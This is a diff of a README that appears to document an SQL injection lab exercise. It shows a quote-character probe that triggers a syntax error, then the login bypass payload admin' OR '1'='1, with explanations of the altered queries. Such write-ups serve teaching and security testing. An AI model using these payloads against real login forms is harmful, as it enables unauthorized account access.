meghabyte-og/SQL_Injection/README.md

 2. SQL Injection attempt:
    To check if the website is vulnerable to SQL injection, I tested the following:
    - Username: admin'
    - Result: Syntax error.
-Encountered "password" at line 1, column 67.
+Encountered "password" at line 1, column 67. <br>
    **Explanation**: The SQL query is now structured as
      SELECT * FROM users WHERE username = 'admin'' AND password = 'password' giving the above error.

 4. Successful SQL Injection:
    - Username: admin' OR '1'='1
    - Password: you can use any password
-   - Result: Successfully logged in
+   - Result: Successfully logged in <br>
    **Explanation**: The SQL query is now structured as
      SELECT * FROM users WHERE username = 'admin' OR '1'='1' AND password = '$input_password'
      Due to the order of precedence for SQL queries, and because '1'='1' is always true, the I could effectively bypass the password check and gain unauthorized access.